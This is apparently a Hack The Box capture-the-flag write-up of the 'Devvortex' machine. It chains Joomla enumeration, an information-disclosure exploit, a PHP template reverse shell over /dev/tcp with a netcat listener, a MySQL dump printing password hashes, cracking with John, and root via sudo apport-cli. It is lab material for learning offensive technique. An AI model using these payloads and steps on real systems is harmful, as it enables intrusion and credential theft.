Hack The Box - Devvortex

04 May 2024 . tech . Comments

Reconnaissance and Initial Steps

Nmap Results
sudo nmap -Pn -sT -sU -sC -sV




Key findings:

  • SSH (Port 22): OpenSSH 8.2p1 on Ubuntu.
  • HTTP (Port 80): Nginx 1.18.0 on Ubuntu, redirecting to http://devvortex.htb/.

The IP address and domain were added to /etc/hosts:

echo "        devvortex.htb" | sudo tee -a /etc/hosts


Directory Brute Force
ffuf -w /home/kali/Tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154 


Found: dev.devvortex.htb

I’ve added it to my /etc/hosts and proceeded to explore this website. Hitting /robots.txt revealed it’s content and it became clear: this is a Joomla CMS.

echo '        dev.devvortex.htb' | sudo tee -a /etc/hosts


Navigating to the /administrator directory..


Enumerating Joomla

Joomla interesting lets see if we can find out the version

Useful Resources: https://hackertarget.com/attacking-enumerating-joomla/?ref=benheater.com#joomla-core-version https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla



Joomla 4.2.6 lets dig and search for some exploits


Running searchsploit joomla 4.2.6 we can see that there is an unauthenticated information disclosure vulnerability we can try.

Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py
searchsploit -m php/webapps/51334.py

Looking over the source code, we can see it’s actually a ruby script

mv 51334.py exploit.rb

to work this script we need to install few missing gems:

sudo gem install httpx
sudo gem install docopt
sudo gem install paint
ruby exploit.rb http://dev.devvortex.htb




First thing I tried, is to SSH into the server with those credentials, but my attempt failed. After all, these credentials enabled Joomla Administrator dashboard access:


Since this is a CMS, based on PHP, we’ll navigate to the templates and create a PHP file/page to execute system commands, for RCE. System ➡ Templates ➡ Administrator Templates.

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

Establishing a connection using netcat:

nc -l 4444


Stabilizing the shell:

export TERM=linux
python3 -c "import pty; pty.spawn('/bin/bash')"

Knowing that the credentials obtained from exploiting the Joomla information leak vulnerability were for MySQL, I proceeded to connect to MySQL to explore the users’ table:

www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 26575
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
| Database           |
| information_schema |
| joomla             |
| performance_schema |
3 rows in set (0.00 sec)

mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;  
| Tables_in_joomla              |  
| sd4fg_action_log_config       |  
| sd4fg_action_logs             |  
| sd4fg_action_logs_extensions  |  
| sd4fg_action_logs_users       |  
| sd4fg_assets                  |  
| sd4fg_associations            |  
| sd4fg_banner_clients          |  
| sd4fg_banner_tracks           |  
| sd4fg_banners                 |  
| sd4fg_categories              |  
| sd4fg_contact_details         |  
| sd4fg_content                 |  
| sd4fg_content_frontpage       |  
| sd4fg_content_rating          |  
| sd4fg_content_types           |  
| sd4fg_contentitem_tag_map     |  
| sd4fg_extensions              |  
| sd4fg_fields                  |  
| sd4fg_fields_categories       |  
| sd4fg_fields_groups           |  
| sd4fg_fields_values           |  
| sd4fg_finder_filters          |  
| sd4fg_finder_links            |  
| sd4fg_finder_links_terms      |  
| sd4fg_finder_logging          |  
| sd4fg_finder_taxonomy         |  
| sd4fg_finder_taxonomy_map     |  
| sd4fg_finder_terms            |  
| sd4fg_finder_terms_common     |  
| sd4fg_finder_tokens           |  
| sd4fg_finder_tokens_aggregate |  
| sd4fg_finder_types            |  
| sd4fg_history                 |  
| sd4fg_languages               |  
| sd4fg_mail_templates          |  
| sd4fg_menu                    |  
| sd4fg_menu_types              |  
| sd4fg_messages                |  
| sd4fg_messages_cfg            |  
| sd4fg_modules                 |  
| sd4fg_modules_menu            |  
| sd4fg_newsfeeds               |  
| sd4fg_overrider               |  
| sd4fg_postinstall_messages    |  
| sd4fg_privacy_consents        |  
| sd4fg_privacy_requests        |  
| sd4fg_redirect_links          |  
| sd4fg_scheduler_tasks         |  
| sd4fg_schemas                 |  
| sd4fg_session                 |  
| sd4fg_tags                    |  
| sd4fg_template_overrides      |  
| sd4fg_template_styles         |  
| sd4fg_ucm_base                |  
| sd4fg_ucm_content             |  
| sd4fg_update_sites            |  
| sd4fg_update_sites_extensions |  
| sd4fg_updates                 |  
| sd4fg_user_keys               |  
| sd4fg_user_mfa                |  
| sd4fg_user_notes              |  
| sd4fg_user_profiles           |  
| sd4fg_user_usergroup_map      |  
| sd4fg_usergroups              |  
| sd4fg_users                   |  
| sd4fg_viewlevels              |  
| sd4fg_webauthn_credentials    |  
| sd4fg_workflow_associations   |  
| sd4fg_workflow_stages         |  
| sd4fg_workflow_transitions    |  
| sd4fg_workflows               |  
71 rows in set (0.00 sec)  
mysql> select * from sd4fg_users;  
| id  | name       | username | email               | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                                                                                  | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |  
| 649 | lewis      | lewis    | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |     0 |         1 | 2023-09-25 16:44:24 | 2023-11-26 13:51:53 | 0          |                                                                                                                                                         | NULL          |          0 |        |      |            0 |              |  
| 650 | logan paul | logan    | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |     0 |         0 | 2023-09-26 19:15:42 | NULL                |            | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL          |          0 |        |      |            0 |              |  
2 rows in set (0.00 sec)

In the users’ table, I found another user, logan, with a BCrypt hashed password. To crack this hash, I created a file named hash.txt, placed the hash inside, and initiated the attack using John the Ripper:

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash
john --wordlist=/home/kali/Tools/rockyou.txt hash


Let’s login with these credentials Via SSH.

ssh logan@devvortex.htb


I found a binary file we can use this binary with the sudo command without a password.

sudo -l


I could run /usr/bin/apport-cliwith sudo, but needed to figure out how to exploit it. Quick research revealed a CVE:

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
sudo /usr/bin/apport-cli -f






Collecting the root flag..


c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.